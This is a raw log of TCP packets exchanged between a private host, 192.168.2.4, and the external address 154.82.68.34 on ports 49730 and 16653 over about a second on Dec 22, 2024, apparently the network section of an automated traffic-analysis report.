                                      Dec 22, 2024 08:37:03.793752909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.793823004 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.793988943 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.794048071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.802159071 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.802233934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.802308083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.802360058 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.810637951 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.810709000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.810889959 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.810944080 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.819000006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.819077969 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.819097996 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.819153070 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.827434063 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.827510118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.827601910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.827655077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.835876942 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.835936069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.835969925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.836003065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.991132975 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.991204023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.017636061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.017699003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.018050909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.018102884 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.021651983 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.021713972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.021718979 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.021770000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.030097008 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.030168056 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.030214071 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.030267000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.038541079 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.038595915 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.038600922 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.038647890 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.046984911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.047115088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.047183990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.047238111 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.055529118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.055565119 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.055587053 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.055623055 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.063852072 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.063921928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.064024925 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.064074993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.072295904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.072361946 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.072412968 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.072463989 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.080616951 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.080673933 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.080729961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.080774069 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.089133978 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.089184999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.245414972 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.245451927 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.245479107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.245523930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.249087095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.249140978 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.249197006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.249248981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.256700039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.256759882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.256793022 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.256836891 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.264856100 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.264893055 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.264909983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.264940023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.271950960 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.272003889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.272072077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.272124052 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.279562950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.279627085 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.279645920 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.279692888 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.287216902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.287307024 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.287328005 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.287380934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.294835091 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.294898033 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.294972897 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.295026064 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.302511930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.302573919 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.302648067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.302702904 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.310060024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.310115099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.310221910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.310281038 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.317903996 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.318082094 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.318099022 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.318145037 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.325315952 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.325412035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.325498104 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.325578928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.474543095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.474566936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.474647999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.476043940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.476108074 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.476159096 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.476217031 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.482040882 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.482098103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.482104063 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.482156038 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.487724066 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.487806082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.487845898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.487917900 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.493583918 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.493647099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.493684053 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.493741989 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.499433994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.499500036 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.499516964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.499589920 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.505223036 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.505281925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.505343914 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.505402088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.511054039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.511113882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.511240959 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.511307001 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.516889095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.516949892 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.517003059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.517062902 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.522738934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.522799969 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.522880077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.522939920 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.528563023 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.528620958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.528697968 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.528757095 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.534418106 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.534476995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.534707069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.534779072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.540215969 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.540272951 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.540318012 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.540371895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.546072006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.546128988 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.546188116 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.546242952 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.551867008 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.551937103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.551990032 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.552062035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.557729959 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.557789087 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.557862997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.557914019 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.563534021 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.563585997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.563592911 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.563636065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.701261044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.701323986 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.701464891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.701527119 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.703201056 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.703260899 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.703269958 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.703352928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.707536936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.707597971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.707604885 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.707659960 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.711853981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.711889982 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.711920023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.711951017 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.716160059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.716218948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.716279984 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.716336966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.720501900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.720558882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.720648050 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.720705032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.724803925 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.724862099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.724957943 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.725029945 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.729156971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.729231119 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.729263067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.729316950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.733472109 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.733549118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.733587027 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.733639002 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.737818956 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.737955093 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.737967968 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.738018990 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.742182016 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.742259026 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.742351055 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.742413044 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.746438980 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.746503115 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.746573925 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.746690035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.750778913 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.750833035 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.750847101 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.750880003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.755121946 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.755187035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.755275011 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.755335093 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.759393930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.759462118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.759763002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.759820938 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.763715029 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.763783932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.763844967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.763900042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.768028021 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.768100023 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.768106937 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.768151045 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.772355080 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.772413969 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.772562027 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.772622108 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.776678085 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.776782990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.776839972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.776874065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.781006098 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.781142950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.781172037 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.781203985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.785327911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.785391092 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.785753965 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.785819054 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.789625883 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.789685965 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.934528112 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.934585094 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.934603930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.934681892 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.936079979 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.936147928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.936170101 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.936224937 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.939467907 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.939529896 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.939693928 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.939758062 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.942941904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.943008900 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.943032026 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.943082094 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.946234941 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.946342945 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.946353912 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.946419001 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.949630976 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.949697018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.949744940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.949800968 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.953016043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.953073978 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.953161001 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.953217983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.956381083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.956440926 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.956528902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.956587076 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.959825039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.959882975 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.959899902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.959959030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.963196039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.963274956 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.963382006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.963462114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.966612101 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.966687918 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.966722965 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.966777086 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.969966888 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.970033884 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.970094919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.970150948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.973397970 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.973463058 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.973511934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.973562956 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.976746082 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.976813078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.976808071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.976860046 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.980117083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.980175972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.980293036 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.980365038 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.983545065 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.983606100 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.983699083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.983760118 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.986891985 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.986951113 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.987097979 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.987157106 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.990293026 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.990367889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.990411043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.990463972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:04.993757963 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.993812084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:04.993812084 CET4973016653192.168.2.4154.82.68.34
